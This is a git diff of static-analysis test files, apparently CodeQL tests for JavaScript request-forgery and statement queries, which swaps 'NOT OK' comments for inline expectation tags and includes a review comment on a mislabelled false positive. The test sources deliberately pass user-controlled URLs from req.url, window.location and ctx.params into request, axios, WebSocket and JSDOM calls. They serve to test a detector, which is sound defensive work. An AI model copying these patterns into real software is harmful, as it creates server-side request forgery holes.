clientSide.js:21:13:21:53 | 'https: ... + '/id' | URL | clientSide.js:20:18:20:28 | window.name | user-provided value | edges | clientSide.js:11:11:11:53 | query | clientSide.js:12:42:12:46 | query | provenance | | | clientSide.js:11:19:11:40 | window. ... .search | clientSide.js:11:19:11:53 | window. ... ring(1) | provenance | | 
@@ -29,8 +34,3 @@ nodes | clientSide.js:21:13:21:53 | 'https: ... + '/id' | semmle.label | 'https: ... + '/id' | | clientSide.js:21:42:21:45 | name | semmle.label | name | subpaths -#select -| clientSide.js:12:5:12:55 | request ... '/id') | clientSide.js:11:19:11:40 | window. ... .search | clientSide.js:12:13:12:54 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:12:13:12:54 | 'https: ... + '/id' | URL | clientSide.js:11:19:11:40 | window. ... .search | user-provided value | -| clientSide.js:14:5:14:64 | request ... search) | clientSide.js:14:42:14:63 | window. ... .search | clientSide.js:14:13:14:63 | 'https: ... .search | The $@ of this request depends on a $@. | clientSide.js:14:13:14:63 | 'https: ... .search | URL | clientSide.js:14:42:14:63 | window. ... .search | user-provided value | -| clientSide.js:17:5:17:58 | request ... '/id') | clientSide.js:16:22:16:41 | window.location.hash | clientSide.js:17:13:17:57 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:17:13:17:57 | 'https: ... + '/id' | URL | clientSide.js:16:22:16:41 | window.location.hash | user-provided value | -| clientSide.js:21:5:21:54 | request ... '/id') | clientSide.js:20:18:20:28 | window.name | clientSide.js:21:13:21:53 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:21:13:21:53 | 'https: ... + '/id' | URL | clientSide.js:20:18:20:28 | window.name | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref index 1557850e85d9..9f67a0ba2a0b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.qlref 
@@ -1 +1,2 @@
-Security/CWE-918/ClientSideRequestForgery.ql
+query: Security/CWE-918/ClientSideRequestForgery.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
index edeab8f1d94f..b62008204c69 100644
--- a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
@@ -1,3 +1,28 @@ +#select +| serverSide.js:18:5:18:20 | request(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:18:13:18:19 | tainted | The $@ of this request depends on a $@. | serverSide.js:18:13:18:19 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:20:5:20:24 | request.get(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:20:17:20:23 | tainted | The $@ of this request depends on a $@. | serverSide.js:20:17:20:23 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:24:5:24:20 | request(options) | serverSide.js:14:29:14:35 | req.url | serverSide.js:23:19:23:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:23:19:23:25 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:26:5:26:32 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:26:13:26:31 | "http://" + tainted | The $@ of this request depends on a $@. | serverSide.js:26:13:26:31 | "http://" + tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:28:5:28:43 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:28:13:28:42 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:28:13:28:42 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:30:5:30:44 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:30:13:30:43 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:30:13:30:43 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:34:5:34:42 | http.ge ... inted}) | serverSide.js:14:29:14:35 | req.url | serverSide.js:34:34:34:40 | tainted | The $@ of this request depends on a $@. 
| serverSide.js:34:34:34:40 | tainted | host | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:36:5:36:32 | XhrIo.s ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:36:16:36:31 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:36:16:36:31 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:37:5:37:38 | new Xhr ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:37:22:37:37 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:37:22:37:37 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:41:5:41:52 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:41:13:41:51 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:41:13:41:51 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:43:5:43:55 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:43:13:43:54 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:43:13:43:54 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:45:5:45:57 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:45:13:45:56 | 'http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:45:13:45:56 | 'http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | +| serverSide.js:61:2:61:37 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:61:29:61:35 | tainted | The $@ of this request depends on a $@. | serverSide.js:61:29:61:35 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | +| serverSide.js:64:3:64:38 | client. ... 
inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:64:30:64:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:64:30:64:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | +| serverSide.js:68:3:68:38 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:68:30:68:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:68:30:68:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | +| serverSide.js:76:5:76:26 | JSDOM.f ... ainted) | serverSide.js:74:29:74:35 | req.url | serverSide.js:76:19:76:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:76:19:76:25 | tainted | URL | serverSide.js:74:29:74:35 | req.url | user-provided value | +| serverSide.js:84:5:84:25 | JSDOM.f ... param1) | serverSide.js:83:38:83:43 | param1 | serverSide.js:84:19:84:24 | param1 | The $@ of this request depends on a $@. | serverSide.js:84:19:84:24 | param1 | URL | serverSide.js:83:38:83:43 | param1 | user-provided value | +| serverSide.js:90:5:90:33 | JSDOM.f ... ms.foo) | serverSide.js:90:19:90:28 | ctx.params | serverSide.js:90:19:90:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:90:19:90:32 | ctx.params.foo | URL | serverSide.js:90:19:90:28 | ctx.params | user-provided value | +| serverSide.js:92:5:92:33 | JSDOM.f ... ms.foo) | serverSide.js:92:19:92:28 | ctx.params | serverSide.js:92:19:92:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:92:19:92:32 | ctx.params.foo | URL | serverSide.js:92:19:92:28 | ctx.params | user-provided value | +| serverSide.js:100:5:100:26 | new Web ... ainted) | serverSide.js:98:29:98:35 | req.url | serverSide.js:100:19:100:25 | tainted | The $@ of this request depends on a $@. 
| serverSide.js:100:19:100:25 | tainted | URL | serverSide.js:98:29:98:35 | req.url | user-provided value | +| serverSide.js:109:20:109:30 | new ws(url) | serverSide.js:108:17:108:27 | request.url | serverSide.js:109:27:109:29 | url | The $@ of this request depends on a $@. | serverSide.js:109:27:109:29 | url | URL | serverSide.js:108:17:108:27 | request.url | user-provided value | +| serverSide.js:117:20:117:30 | new ws(url) | serverSide.js:115:25:115:35 | request.url | serverSide.js:117:27:117:29 | url | The $@ of this request depends on a $@. | serverSide.js:117:27:117:29 | url | URL | serverSide.js:115:25:115:35 | request.url | user-provided value | +| serverSide.js:125:5:128:6 | axios({ ... \\n }) | serverSide.js:123:29:123:35 | req.url | serverSide.js:127:14:127:20 | tainted | The $@ of this request depends on a $@. | serverSide.js:127:14:127:20 | tainted | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | +| serverSide.js:131:5:131:20 | axios.get(myUrl) | serverSide.js:123:29:123:35 | req.url | serverSide.js:131:15:131:19 | myUrl | The $@ of this request depends on a $@. | serverSide.js:131:15:131:19 | myUrl | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | edges | serverSide.js:14:9:14:52 | tainted | serverSide.js:18:13:18:19 | tainted | provenance | | | serverSide.js:14:9:14:52 | tainted | serverSide.js:20:17:20:23 | tainted | provenance | | 
@@ -107,28 +132,3 @@ nodes | serverSide.js:130:37:130:43 | tainted | semmle.label | tainted | | serverSide.js:131:15:131:19 | myUrl | semmle.label | myUrl | subpaths -#select -| serverSide.js:18:5:18:20 | request(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:18:13:18:19 | tainted | The $@ of this request depends on a $@. | serverSide.js:18:13:18:19 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:20:5:20:24 | request.get(tainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:20:17:20:23 | tainted | The $@ of this request depends on a $@. | serverSide.js:20:17:20:23 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:24:5:24:20 | request(options) | serverSide.js:14:29:14:35 | req.url | serverSide.js:23:19:23:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:23:19:23:25 | tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:26:5:26:32 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:26:13:26:31 | "http://" + tainted | The $@ of this request depends on a $@. | serverSide.js:26:13:26:31 | "http://" + tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:28:5:28:43 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:28:13:28:42 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:28:13:28:42 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:30:5:30:44 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:30:13:30:43 | "http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:30:13:30:43 | "http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:34:5:34:42 | http.ge ... 
inted}) | serverSide.js:14:29:14:35 | req.url | serverSide.js:34:34:34:40 | tainted | The $@ of this request depends on a $@. | serverSide.js:34:34:34:40 | tainted | host | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:36:5:36:32 | XhrIo.s ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:36:16:36:31 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:36:16:36:31 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:37:5:37:38 | new Xhr ... inted)) | serverSide.js:14:29:14:35 | req.url | serverSide.js:37:22:37:37 | new Uri(tainted) | The $@ of this request depends on a $@. | serverSide.js:37:22:37:37 | new Uri(tainted) | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:41:5:41:52 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:41:13:41:51 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:41:13:41:51 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:43:5:43:55 | request ... nted}`) | serverSide.js:14:29:14:35 | req.url | serverSide.js:43:13:43:54 | `http:/ ... inted}` | The $@ of this request depends on a $@. | serverSide.js:43:13:43:54 | `http:/ ... inted}` | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:45:5:45:57 | request ... ainted) | serverSide.js:14:29:14:35 | req.url | serverSide.js:45:13:45:56 | 'http:/ ... tainted | The $@ of this request depends on a $@. | serverSide.js:45:13:45:56 | 'http:/ ... tainted | URL | serverSide.js:14:29:14:35 | req.url | user-provided value | -| serverSide.js:61:2:61:37 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:61:29:61:35 | tainted | The $@ of this request depends on a $@. 
| serverSide.js:61:29:61:35 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | -| serverSide.js:64:3:64:38 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:64:30:64:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:64:30:64:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | -| serverSide.js:68:3:68:38 | client. ... inted}) | serverSide.js:58:29:58:35 | req.url | serverSide.js:68:30:68:36 | tainted | The $@ of this request depends on a $@. | serverSide.js:68:30:68:36 | tainted | URL | serverSide.js:58:29:58:35 | req.url | user-provided value | -| serverSide.js:76:5:76:26 | JSDOM.f ... ainted) | serverSide.js:74:29:74:35 | req.url | serverSide.js:76:19:76:25 | tainted | The $@ of this request depends on a $@. | serverSide.js:76:19:76:25 | tainted | URL | serverSide.js:74:29:74:35 | req.url | user-provided value | -| serverSide.js:84:5:84:25 | JSDOM.f ... param1) | serverSide.js:83:38:83:43 | param1 | serverSide.js:84:19:84:24 | param1 | The $@ of this request depends on a $@. | serverSide.js:84:19:84:24 | param1 | URL | serverSide.js:83:38:83:43 | param1 | user-provided value | -| serverSide.js:90:5:90:33 | JSDOM.f ... ms.foo) | serverSide.js:90:19:90:28 | ctx.params | serverSide.js:90:19:90:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:90:19:90:32 | ctx.params.foo | URL | serverSide.js:90:19:90:28 | ctx.params | user-provided value | -| serverSide.js:92:5:92:33 | JSDOM.f ... ms.foo) | serverSide.js:92:19:92:28 | ctx.params | serverSide.js:92:19:92:32 | ctx.params.foo | The $@ of this request depends on a $@. | serverSide.js:92:19:92:32 | ctx.params.foo | URL | serverSide.js:92:19:92:28 | ctx.params | user-provided value | -| serverSide.js:100:5:100:26 | new Web ... ainted) | serverSide.js:98:29:98:35 | req.url | serverSide.js:100:19:100:25 | tainted | The $@ of this request depends on a $@. 
| serverSide.js:100:19:100:25 | tainted | URL | serverSide.js:98:29:98:35 | req.url | user-provided value | -| serverSide.js:109:20:109:30 | new ws(url) | serverSide.js:108:17:108:27 | request.url | serverSide.js:109:27:109:29 | url | The $@ of this request depends on a $@. | serverSide.js:109:27:109:29 | url | URL | serverSide.js:108:17:108:27 | request.url | user-provided value | -| serverSide.js:117:20:117:30 | new ws(url) | serverSide.js:115:25:115:35 | request.url | serverSide.js:117:27:117:29 | url | The $@ of this request depends on a $@. | serverSide.js:117:27:117:29 | url | URL | serverSide.js:115:25:115:35 | request.url | user-provided value | -| serverSide.js:125:5:128:6 | axios({ ... \\n }) | serverSide.js:123:29:123:35 | req.url | serverSide.js:127:14:127:20 | tainted | The $@ of this request depends on a $@. | serverSide.js:127:14:127:20 | tainted | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | -| serverSide.js:131:5:131:20 | axios.get(myUrl) | serverSide.js:123:29:123:35 | req.url | serverSide.js:131:15:131:19 | myUrl | The $@ of this request depends on a $@. | serverSide.js:131:15:131:19 | myUrl | URL | serverSide.js:123:29:123:35 | req.url | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref index fcb4e41daf88..28fbe9364a97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -1 +1,2 @@ -Security/CWE-918/RequestForgery.ql +query: Security/CWE-918/RequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index c55270377ede..d546d809a9dd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js 
@@ -8,18 +8,18 @@ export function MyComponent() { request('https://example.com/api/' + params.foo + '/id'); // OK - cannot manipulate path using `../` request(params.foo); // Possibly problematic, but not currently flagged. - const query = window.location.search.substring(1); - request('https://example.com/api/' + query + '/id'); // NOT OK - request('https://example.com/api?q=' + query); // OK - request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway + const query = window.location.search.substring(1); // $ Source[js/client-side-request-forgery] + request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] + request('https://example.com/api?q=' + query); + request('https://example.com/api/' + window.location.search); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] - likely OK - but currently flagged anyway - const fragment = window.location.hash.substring(1); - request('https://example.com/api/' + fragment + '/id'); // NOT OK - request('https://example.com/api?q=' + fragment); // OK + const fragment = window.location.hash.substring(1); // $ Source[js/client-side-request-forgery] + request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] + request('https://example.com/api?q=' + fragment); - const name = window.name; - request('https://example.com/api/' + name + '/id'); // NOT OK - request('https://example.com/api?q=' + name); // OK + const name = window.name; // $ Source[js/client-side-request-forgery] + request('https://example.com/api/' + name + '/id'); // $ Alert[js/client-side-request-forgery] Sink[js/client-side-request-forgery] + request('https://example.com/api?q=' + name); - request(window.location.href + '?q=123'); // OK + request(window.location.href + '?q=123'); } 
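Review bot: The `request('https://example.com/api/' + window.location.search)` line is annotated as an expected `Alert[js/client-side-request-forgery]` while its trailing text still reads `likely OK - but currently flagged anyway`, so a known false positive is recorded as if it were a true positive. The inline-expectations syntax has a `SPURIOUS:` prefix for this, the counterpart of the `MISSING:` prefix the commit already uses in serverSide.js. I would write the alert tag as `// $ SPURIOUS: Alert[js/client-side-request-forgery]`; how the accompanying `Sink[...]` tag should be marked needs checking against the test framework. As it stands, a later precision fix to the query would show up as a test regression, and the test no longer separates real detections from accepted noise. `MyComponent` begins before the hunk.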
diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js
index 7b4c792bb366..fce762084455 100644
--- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js
+++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js
@@ -11,42 +11,42 @@ let XhrIo = goog.require('goog.net.XhrIo'); let Uri = goog.require('goog.Uri'); var server = http.createServer(function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] - request("example.com"); // OK + request("example.com"); - request(tainted); // NOT OK + request(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request.get(tainted); // NOT OK + request.get(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] var options = {}; - options.url = tainted; // NOT OK - request(options); + options.url = tainted; // $ Sink[js/request-forgery] + request(options); // $ Alert[js/request-forgery] - request("http://" + tainted); // NOT OK + request("http://" + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request("http://example.com" + tainted); // NOT OK + request("http://example.com" + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request("http://example.com/" + tainted); // NOT OK + request("http://example.com/" + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request("http://example.com/?" + tainted); // OK + request("http://example.com/?" 
+ tainted); - http.get(relativeUrl, {host: tainted}); // NOT OK + http.get(relativeUrl, {host: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] - XhrIo.send(new Uri(tainted)); // NOT OK - new XhrIo().send(new Uri(tainted)); // NOT OK + XhrIo.send(new Uri(tainted)); // $ Alert[js/request-forgery] Sink[js/request-forgery] + new XhrIo().send(new Uri(tainted)); // $ Alert[js/request-forgery] Sink[js/request-forgery] let base = require('./config').base; - request(`http://example.com/${base}/${tainted}`); // NOT OK + request(`http://example.com/${base}/${tainted}`); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request(`http://example.com/${base}/v1/${tainted}`); // NOT OK + request(`http://example.com/${base}/v1/${tainted}`); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request('http://example.com/' + base + '/' + tainted); // NOT OK + request('http://example.com/' + base + '/' + tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] - request('http://example.com/' + base + ('/' + tainted)); // NOT OK - but not flagged [INCONSISTENCY] + request('http://example.com/' + base + ('/' + tainted)); // $ MISSING: Alert - request(`http://example.com/?${base}/${tainted}`); // OK + request(`http://example.com/?${base}/${tainted}`); request(`http://example.com/${base}${tainted}`); // OK - assumed safe 
@@ -55,49 +55,49 @@ var server = http.createServer(function(req, res) { var CDP = require("chrome-remote-interface"); var server = http.createServer(async function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] var client = await CDP(options); - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] CDP(options).catch((ignored) => {}).then((client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] }) CDP(options, (client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); }) import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] - JSDOM.fromURL(tainted); // NOT OK + JSDOM.fromURL(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); var route = require('koa-route'); var Koa = require('koa'); var app = new Koa(); -app.use(route.get('/pets', (context, param1, param2, param3) => { - JSDOM.fromURL(param1); // NOT OK +app.use(route.get('/pets', (context, param1, param2, param3) => { // $ Source[js/request-forgery] + JSDOM.fromURL(param1); // $ Alert[js/request-forgery] Sink[js/request-forgery] })); const router = require('koa-router')(); const app = new Koa(); router.get('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] Sink[js/request-forgery] }).post('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); 
app.use(router.routes()); import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] - new WebSocket(tainted); // NOT OK + new WebSocket(tainted); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); @@ -105,31 +105,31 @@ import * as ws from 'ws'; new ws.Server({ port: 8080 }).on('connection', function(socket, request) { socket.on('message', function(message) { - const url = request.url; - const socket = new ws(url); + const url = request.url; // $ Source[js/request-forgery] + const socket = new ws(url); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); }); new ws.Server({ port: 8080 }).on('connection', function (socket, request) { socket.on('message', function (message) { - const url = new URL(request.url, base); + const url = new URL(request.url, base); // $ Source[js/request-forgery] const target = new URL(url.pathname, base); - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] Sink[js/request-forgery] }); }); var server2 = http.createServer(function(req, res) { - var tainted = url.parse(req.url, true).query.url; + var tainted = url.parse(req.url, true).query.url; // $ Source[js/request-forgery] axios({ method: 'get', - url: tainted // NOT OK - }) + url: tainted // $ Sink[js/request-forgery] + }) // $ Alert[js/request-forgery] var myUrl = `${something}/bla/${tainted}`; - axios.get(myUrl); // NOT OK + axios.get(myUrl); // $ Alert[js/request-forgery] Sink[js/request-forgery] var myEncodedUrl = `${something}/bla/${encodeURIComponent(tainted)}`; - axios.get(myEncodedUrl); // OK + axios.get(myEncodedUrl); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref b/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref index 4bccc4a7469e..69b8d7561a2b 100644 
--- a/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/DanglingElse.qlref @@ -1 +1,2 @@ -Statements/DanglingElse.ql \ No newline at end of file +query: Statements/DanglingElse.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js index ea1966d190b7..5ff77f4e77bc 100644 --- a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js @@ -2,7 +2,7 @@ function bad1() { if (cond1()) if (cond2()) return 23; - else + else // $ Alert return 42; } @@ -18,7 +18,7 @@ function bad2() { if (cond1()) { if (cond2()) { return 23; - } else { + } else { // $ Alert return 42; }} } @@ -37,7 +37,7 @@ function bad3() { else if (cond2()) if (cond2()) return 42; - else + else // $ Alert return 42; } diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected index 887e249db55a..60c733458315 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:9 | while(c ... reak;\\n} | This loop executes at most once. | -| tst.js:13:3:13:29 | for (; ... et;\\n } | This loop executes at most once. | +| tst.js:1:1:1:20 | while(c ... reak;\\n} | This loop executes at most once. | +| tst.js:11:3:11:40 | for (; ... et;\\n } | This loop executes at most once. | diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref index f30b9bb5fd7d..18a02cd30a12 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref 
+++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/EphemeralLoop.qlref @@ -1 +1,2 @@ -Statements/EphemeralLoop.ql +query: Statements/EphemeralLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js index 1b66865ea21c..c3dc1f230889 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js @@ -1,5 +1,4 @@ -// NOT OK -while(c){ +while(c){ // $ Alert switch(c){ case "/": break; @@ -8,23 +7,22 @@ while(c){ break; } -// NOT OK function f() { - for (; k < numprecincts;) { + for (; k < numprecincts;) { // $ Alert var packet = createPacket(resolution, k, l); k++; return packet; } } -// OK + var oHasProps = false; for (var p in o) { oHasProps = true; break; } -// OK + while(c){ if (c === '"') break; diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref index 2cbc7e722a5c..46598aaab68f 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/IgnoreArrayResult.qlref @@ -1 +1,2 @@ -Statements/IgnoreArrayResult.ql \ No newline at end of file +query: Statements/IgnoreArrayResult.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js index 47efe8c1cb6c..adbd85cf6157 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js 
@@ -1,8 +1,8 @@ var arr = [1,2,3]; -arr.concat([1,2,3]); // NOT OK! +arr.concat([1,2,3]); // $ Alert -arr.concat(arr); // NOT OK! +arr.concat(arr); // $ Alert console.log(arr.concat([1,2,3])); diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected index 13c308ac7010..6db0835ca621 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected +++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.expected 
@@ -1,3 +1,3 @@
